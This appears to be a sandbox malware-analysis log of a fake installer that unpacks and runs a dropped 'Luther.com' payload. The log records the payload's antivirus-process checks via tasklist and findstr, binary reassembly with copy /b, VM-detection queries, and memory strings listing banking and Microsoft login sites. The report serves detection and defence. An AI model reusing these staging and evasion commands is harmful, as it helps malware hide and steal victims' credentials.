Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\224553\Luther.com Luther.com z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Unexpected Unexpected.cmd & Unexpected.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 224553	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Choosing	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Readily" Departure	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 224553\Luther.com + Remote + Priorities + Cho + Reliability + Rating + Dot + Holocaust + Page + Webshots 224553\Luther.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Crowd + ..\Leone + ..\Tutorial + ..\Architect + ..\Mutual + ..\Margin + ..\Many z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\224553\Luther.com Luther.com z	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: installer_1.05_37.4.exe

Static file information: File size 1120175 > 1048576

Source: installer_1.05_37.4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: installer_1.05_37.4.exe

Static PE information: real checksum: 0x11513a should be: 0x11be2a

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E50DE6 push ecx; ret

13_2_00E50DF9

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EC26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		13_2_00EC26DD
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E4FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		13_2_00E4FC7C

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_13-102938

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

API coverage: 3.7 %

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com TID: 7980

Thread sleep time: -30000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\installer_1.05_37.4.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00E9DC54
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EAA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00EAA087
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EAA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	13_2_00EAA1E2
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	13_2_00E9E472
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EAA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	13_2_00EAA570
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA66DC FindFirstFileW,FindNextFileW,FindClose,	13_2_00EA66DC
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E6C622 FindFirstFileExW,	13_2_00E6C622
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	13_2_00EA73D4
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00EA7333 FindFirstFileW,FindClose,	13_2_00EA7333
Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com	Code function: 13_2_00E9D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	13_2_00E9D921

Source: C:\Users\user\AppData\Local\Temp\224553\Luther.com

Code function: 13_2_00E35FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

13_2_00E35FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\224553	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\224553\	Jump to behavior

Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Luther.com, 0000000D.00000002.4497214664.00000000013EA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX8
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Luther.com, 0000000D.00000003.2259044723.00000000038CC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: Luther.com, 0000000D.00000002.4497796930.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWT
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Luther.com, 0000000D.00000003.2259044723.00000000038C6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
